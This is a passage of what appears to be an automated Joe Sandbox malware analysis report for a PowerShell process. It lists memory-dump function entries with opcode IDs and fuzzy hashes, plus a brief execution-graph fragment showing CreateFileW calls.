                                                                Uniqueness Score: -1.00%

                                                                Function 00F70CE0, Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50d4761a41287ea7afcab9000b8fc002f14e44c3e23c0b68eb8f56f445de591d
                                                                • Instruction ID: 2a47637092f823c91504f8e86b1bcf71cba71609e5c6d1736c9a9e0ed1f7cafb
                                                                • Opcode Fuzzy Hash: 50d4761a41287ea7afcab9000b8fc002f14e44c3e23c0b68eb8f56f445de591d
                                                                • Instruction Fuzzy Hash: 8D212A39B00209DBCB24DF64D454AAAF7E6EF88214B148529E909D7741DF71AC468B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7C940, Relevance: .1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f8498faeb2db467eac8dfec28b713dc9dea6a26089ec00aa4835096b81b5c3e
                                                                • Instruction ID: 59524889c558b594689ceb26a51bb5815653909d7c67284617a4c38b420ed2e3
                                                                • Opcode Fuzzy Hash: 6f8498faeb2db467eac8dfec28b713dc9dea6a26089ec00aa4835096b81b5c3e
                                                                • Instruction Fuzzy Hash: 82212C317017008BC7A89E26D494A27BBB6BFC4315324C92ED58A87711CB35EC81EB81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F776A8, Relevance: .1, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d693e600461d4636b8737d4bd065a754fc5a7dcc8305ef2ab51ef0235d3c578f
                                                                • Instruction ID: 464a5fc469e9ac10e9670dfb7026a077f223adf70264081cd8926d0543421b8c
                                                                • Opcode Fuzzy Hash: d693e600461d4636b8737d4bd065a754fc5a7dcc8305ef2ab51ef0235d3c578f
                                                                • Instruction Fuzzy Hash: D921B034210755DFC740EF29D890D9AB7E2EF89208B48CD29E6468F365CB70E809CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F77FD8, Relevance: .1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e4376057d8863b10b366f699d40c2e58fc989f2397c6e64b2d513298b0f3b77
                                                                • Instruction ID: 90b59da36eebe50ddbdd17597bf880b8322cb0fb848e759c7073de0f96c4265a
                                                                • Opcode Fuzzy Hash: 6e4376057d8863b10b366f699d40c2e58fc989f2397c6e64b2d513298b0f3b77
                                                                • Instruction Fuzzy Hash: E721D135B112149BCB04DF65D898AAEBBB6EF89351F10817AE806AB350DF319C05DBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7E9F0, Relevance: .1, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e7c9a3d8ce51ec354e4619617a4022566f3fce5488a105c5ef93fce5c0cb0df
                                                                • Instruction ID: 2659cf24a37c4865b7d095427c78e35b0effb335f1d05cfbf87e92a965c17b25
                                                                • Opcode Fuzzy Hash: 6e7c9a3d8ce51ec354e4619617a4022566f3fce5488a105c5ef93fce5c0cb0df
                                                                • Instruction Fuzzy Hash: B421F775A0020A9FCB14CF98C584DAAFBB2FF4C310B158566D909AB311C735ED55CBE2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7599F, Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 04996b6992d58e30eeef149b9df66162860492cb9a6e13278880186b4e428f1e
                                                                • Instruction ID: 036204b539b81d449d561f03e5473afd9f21f01a9fa6f7713f68b6cf5a89831c
                                                                • Opcode Fuzzy Hash: 04996b6992d58e30eeef149b9df66162860492cb9a6e13278880186b4e428f1e
                                                                • Instruction Fuzzy Hash: 8C21A2349042089FDB00EBB4D464BAEBBB6EF8A305F0489BDC155AF395DF345D018BA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F78217, Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92203d4b0a49253dc2a745815dfdad39672c1530e1a7bb0dde38972d204ed9e6
                                                                • Instruction ID: b6719f34d1911e5902c8e739eaad1791c3bc16d666399702e6a0278b6156560d
                                                                • Opcode Fuzzy Hash: 92203d4b0a49253dc2a745815dfdad39672c1530e1a7bb0dde38972d204ed9e6
                                                                • Instruction Fuzzy Hash: 5621AF347002049FCB00EFA4E444BAE77B2FF89352F1441A9E405AB291DB34C941DB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7F83C, Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c68f86349f10f872dbca75e1c2a4fe19dc9531d9afe6a30eefcee5415fdf0108
                                                                • Instruction ID: 7902351bbe3f17f140148de98c98bdfaa41fb8ae99ce1f80932b4439ed49f461
                                                                • Opcode Fuzzy Hash: c68f86349f10f872dbca75e1c2a4fe19dc9531d9afe6a30eefcee5415fdf0108
                                                                • Instruction Fuzzy Hash: 5A117C35604A16DBC724DB1ED8C0B29B7F0AF453207508466EADECBB21D720ED45EB52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7ACC9, Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3199f6b263dc3f0017a63b1762e8c496e7b3137b8ac066c67cab05ca267aa98b
                                                                • Instruction ID: 9eced5dc51d7e500c258e025b645f5f4288b6dfecdb4d1f563406fd465763ff7
                                                                • Opcode Fuzzy Hash: 3199f6b263dc3f0017a63b1762e8c496e7b3137b8ac066c67cab05ca267aa98b
                                                                • Instruction Fuzzy Hash: 4011A031A043588FDF25CF68C800ADEBBF6EFC9310F1585AAD885A7291D730AC05CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F751A0, Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 79b4da4bb3e5dc88bc1ff004fafcde0c67dfd8af892c23fda94406e93651cbb6
                                                                • Instruction ID: e3a85ea6d8508fcc179e2eddc79136b1ab1e60b450559974451e601d1f1edda1
                                                                • Opcode Fuzzy Hash: 79b4da4bb3e5dc88bc1ff004fafcde0c67dfd8af892c23fda94406e93651cbb6
                                                                • Instruction Fuzzy Hash: 9311A330E013554FDB56DBA4D8407AE7BB5EF4A300F04406BD518EB242DB788905CBB2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F759B0, Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d6d18c524371077b6398fea273f4c5971665dbac11047687263cfcdfc65189d
                                                                • Instruction ID: 905f336f77d9a3a4941460123ad930339f45901552f52cd28b75f90b815ef84e
                                                                • Opcode Fuzzy Hash: 2d6d18c524371077b6398fea273f4c5971665dbac11047687263cfcdfc65189d
                                                                • Instruction Fuzzy Hash: A1115178A002089FDB04EFA4D454BAE77B6EF89305F1489BDC255AF394EF345E018B96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7C910, Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 29cea9fc08c08df990ac95ba51d587f91d1a22a765cf9aa917ab0c28fd4246b4
                                                                • Instruction ID: 49459a1be1fb6d0b8b8d13e95c795eadb34c95f694b6b859371bb71cb53cdd16
                                                                • Opcode Fuzzy Hash: 29cea9fc08c08df990ac95ba51d587f91d1a22a765cf9aa917ab0c28fd4246b4
                                                                • Instruction Fuzzy Hash: 4C115E3520E7C14FC31747259C14B427FB59F87255F1A81EAD889CB1A3CB3A9C46D721
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7AFB0, Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1e93f29f0d0c27a535516cb5978f21065e8a146253166f061c6353365c167379
                                                                • Instruction ID: b7e44b5291bb687b245ab3f82a3520a7f9563446c98477546be78b758ec1e692
                                                                • Opcode Fuzzy Hash: 1e93f29f0d0c27a535516cb5978f21065e8a146253166f061c6353365c167379
                                                                • Instruction Fuzzy Hash: 6301C032D1024A9BCB05EFA4DC508DDFB72EFCA314F154666E6107B160EBB0354ACBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F799EB, Relevance: .0, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52138b9f619b77000cfb52c145d60ea1841c8e57bbabcc9627a21a97fda63d5f
                                                                • Instruction ID: 9c18f9fcabe2e3dd19ada3fc6617ba087c787cb34d08167a73ecee737bf2609b
                                                                • Opcode Fuzzy Hash: 52138b9f619b77000cfb52c145d60ea1841c8e57bbabcc9627a21a97fda63d5f
                                                                • Instruction Fuzzy Hash: 070128363097409FC700E768EC5089EBFB6DFCA205308486FD255CB251DB795C08C7A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7EE2F, Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17046b5979fb7e26581a7fe076bbb81feb49b22992c0ff9f24ce037b86e9d36b
                                                                • Instruction ID: 6e2c77b6000af32d16fd48fe718bd7a9b33071b6f63c0820c573d6f62153aebe
                                                                • Opcode Fuzzy Hash: 17046b5979fb7e26581a7fe076bbb81feb49b22992c0ff9f24ce037b86e9d36b
                                                                • Instruction Fuzzy Hash: F801F232A002888FDB15D760C9A0ADE7FA59F9A304F1588ABD412AB2D1EF705906C7D2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7AFC0, Relevance: .0, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b8df9b285b8ce782c98a79ee5dcbf8a42caccc5fa2ec9d5521ba5fc57325683f
                                                                • Instruction ID: eebd9b7605ac3553a587b20852138d918daa4889a2e333bcf628d9e7d007e585
                                                                • Opcode Fuzzy Hash: b8df9b285b8ce782c98a79ee5dcbf8a42caccc5fa2ec9d5521ba5fc57325683f
                                                                • Instruction Fuzzy Hash: D8011A32D1061A9ACF04DFA4DC404DEFB76EFD9314F254625E6113B160EBB0258ACBE2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7F788, Relevance: .0, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0a48c734dab8e9baf0c1249bf954d3f3a867f30632fbcdd2cad858badc58ab52
                                                                • Instruction ID: c191305b3da15337f6cb883fd8d4ecdcd559b604002e2a8c6b1e54af4a53e261
                                                                • Opcode Fuzzy Hash: 0a48c734dab8e9baf0c1249bf954d3f3a867f30632fbcdd2cad858badc58ab52
                                                                • Instruction Fuzzy Hash: 96019E30E043A94AEB18EB64C4147EEBBF2AB49304F24856EC005B73C1CBB55D09A7A3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F79A00, Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08dda03cfa13f26a3aa0c71335219422834bd7f4e709b282790f3ee84bf16318
                                                                • Instruction ID: 8c2ee6d121bbe6869dde40a94499109489f1d744ba449ff3da5e244f92a14cf5
                                                                • Opcode Fuzzy Hash: 08dda03cfa13f26a3aa0c71335219422834bd7f4e709b282790f3ee84bf16318
                                                                • Instruction Fuzzy Hash: 35F0AF35300304AFC704FB99E844C9EBBAAEBC9256744493AE219CB350DB76AC0587A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F70438, Relevance: .0, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 69d36cb1413726e4adde7afeaf83fcdaee500e6bc115aa07a7628cb1b97f4622
                                                                • Instruction ID: 8ee5b92a567d5537bbc716932485709f937015c04d44b86ac45bb3cf64190634
                                                                • Opcode Fuzzy Hash: 69d36cb1413726e4adde7afeaf83fcdaee500e6bc115aa07a7628cb1b97f4622
                                                                • Instruction Fuzzy Hash: 11F081319042609FCB12CF28D880859BBB5EE49320319819AE948CB762C731EC11CBD1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7EE98, Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8cfe64a3ba20948a4175c7e39df9932bc75051b45eaef73b1e43a31892a53667
                                                                • Instruction ID: 7686f15c03e5b783adcb9403e3553a03d5304e11bd554b5569ee3d8e3808d936
                                                                • Opcode Fuzzy Hash: 8cfe64a3ba20948a4175c7e39df9932bc75051b45eaef73b1e43a31892a53667
                                                                • Instruction Fuzzy Hash: 8CF0F632A041489FDB05DB60C864BEF7BE59F88300F15882AD512BB280EF706506C6D2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7B041, Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84e723d78be92ef8a12eb6397d703238418b37a660c5e8a9c97e978fd21f6ffb
                                                                • Instruction ID: 975dbde4e70a167a0d28da53a57360f9e9a8942ed48111d47e3dee5f8986d5e4
                                                                • Opcode Fuzzy Hash: 84e723d78be92ef8a12eb6397d703238418b37a660c5e8a9c97e978fd21f6ffb
                                                                • Instruction Fuzzy Hash: B8F0E9726007021BC712D73DD810BAA7799CFC777470586BAD468CF291DF65EC0647A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F76039, Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f08373944034746ab4e653956f838d299fed0ffe42e786bfe363b6c4c978e877
                                                                • Instruction ID: 9f82a69569500cb227a8a917bdc9a58eee243f4e322516ac663e242689938bcf
                                                                • Opcode Fuzzy Hash: f08373944034746ab4e653956f838d299fed0ffe42e786bfe363b6c4c978e877
                                                                • Instruction Fuzzy Hash: 22F0AF709042089FDB51EBB4C9083EF7BF5EF8A311F014479C909DB280EB745900CBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7EEA0, Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 62856019e986a1df2363fd917b8e550dd74c1d608e9499f9a3e48a472ae1a93e
                                                                • Instruction ID: ffee087464aa13ebb6019f95a86b55a5a937af6b3844c2fa64052a6bef98c0f0
                                                                • Opcode Fuzzy Hash: 62856019e986a1df2363fd917b8e550dd74c1d608e9499f9a3e48a472ae1a93e
                                                                • Instruction Fuzzy Hash: FDF08932E001499BDB14DB60C8649EFBBF99F48304F15882AD512BB284EF705505D6D6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7EE50, Relevance: .0, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 650698c38c895873dc244dc1c8992a22b96e5736bbcebb2fcf1ad8cefd986c55
                                                                • Instruction ID: 0e2c0f5aca62752c838756afacd787c0fa61efd73862b76f18ade9cfffb6f772
                                                                • Opcode Fuzzy Hash: 650698c38c895873dc244dc1c8992a22b96e5736bbcebb2fcf1ad8cefd986c55
                                                                • Instruction Fuzzy Hash: EBF0E26184478A4EDB12EB70D9207EE3FA05F42314F24458AC495AA1C2CB30014796A6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7B050, Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 473373ce952a9c10ccdfb8c802195991b1e5d9244644858f6dfefd37095d2672
                                                                • Instruction ID: ac52d219adc78a37d0fd36d27285b05b7a3ace2292b27e35651e0b046058d21b
                                                                • Opcode Fuzzy Hash: 473373ce952a9c10ccdfb8c802195991b1e5d9244644858f6dfefd37095d2672
                                                                • Instruction Fuzzy Hash: 15E09232700712178B22E629D810ABEB39EDBC6374305893AE528CF700EFA1EC0557D2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F77A0F, Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 72d608712b99990b741667e8cc92ed9c4aa79fdd9b617e9149e9567921254bd9
                                                                • Instruction ID: c4470d103ce8e146cbcf1e24764f57827252553839e97662936795264f326ceb
                                                                • Opcode Fuzzy Hash: 72d608712b99990b741667e8cc92ed9c4aa79fdd9b617e9149e9567921254bd9
                                                                • Instruction Fuzzy Hash: 03F0B279A51204CFD708DF59E490DA8B3B1FF48324B2180A6E5158F372C731EE01DB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7999E, Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c662202db0416408a1bb40900e27898891882ba836e4cdf3bdb4f0f11035192
                                                                • Instruction ID: 6417d074bb5d7232e159326c189ce7131f152ed2d9099091b666933a16fa7524
                                                                • Opcode Fuzzy Hash: 3c662202db0416408a1bb40900e27898891882ba836e4cdf3bdb4f0f11035192
                                                                • Instruction Fuzzy Hash: E5F0393AB00109DFDF04DFA4E8509EEBB72FB98324B24C52AEA0997205D7319952DB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7EE70, Relevance: .0, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2df5288f4860caa7fdc3ba9d803e536709d95012e13c90546bd1f154746e39fc
                                                                • Instruction ID: a76de744f9a6697995d35331a7f00f69aaf8ea612e6a6bfbf04f93af8fb6b4f0
                                                                • Opcode Fuzzy Hash: 2df5288f4860caa7fdc3ba9d803e536709d95012e13c90546bd1f154746e39fc
                                                                • Instruction Fuzzy Hash: BDE026B14087CA8EDB128710EB643ED3FA05F03B04F2104CBC094EA1D2C7340202E3A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F733B1, Relevance: .0, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 179f74c14315e5de3027d3b051fc1dd4eb24ff9858b0b211bdd64d5eabd7a530
                                                                • Instruction ID: e7d1dcf7c88eda84b6f0e4d196bd6afeb5773ab0b00c5e2bb687f112a91662b8
                                                                • Opcode Fuzzy Hash: 179f74c14315e5de3027d3b051fc1dd4eb24ff9858b0b211bdd64d5eabd7a530
                                                                • Instruction Fuzzy Hash: E0F03931D4525AEBDB75DF44D805BEDBB71BB18354F20849BE049A2181CBB40E80FF62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F79387, Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 79bcb62f22914cdde0ac6e3e4ca75b9336ba88888a23bd8676a477d9f47fc270
                                                                • Instruction ID: 4fa007246656fcc6e2ddb233ec991ec6a0263225cb59dfda84ba0e271355ff2f
                                                                • Opcode Fuzzy Hash: 79bcb62f22914cdde0ac6e3e4ca75b9336ba88888a23bd8676a477d9f47fc270
                                                                • Instruction Fuzzy Hash: 77B09237A08108C9DB008A84B4417EDF738E790325F208027C6145108083710268A6A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Analysis Process: powershell.exe PID: 5344 Parent PID: 4972 powershell.exeCOMMON

                                                                Execution Graph

                                                                Execution Coverage:7.6%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:7
                                                                Total number of Limit Nodes:1

                                                                Graph

                                                                execution_graph 41137 846f868 41143 846f274 41137->41143 41139 846f89d 41141 846f964 CreateFileW 41142 846f9a1 41141->41142 41145 846f910 CreateFileW 41143->41145 41146 846f887 41145->41146 41146->41139 41146->41141

                                                                Executed Functions

                                                                Function 035F6337, Relevance: .7, Instructions: 660COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
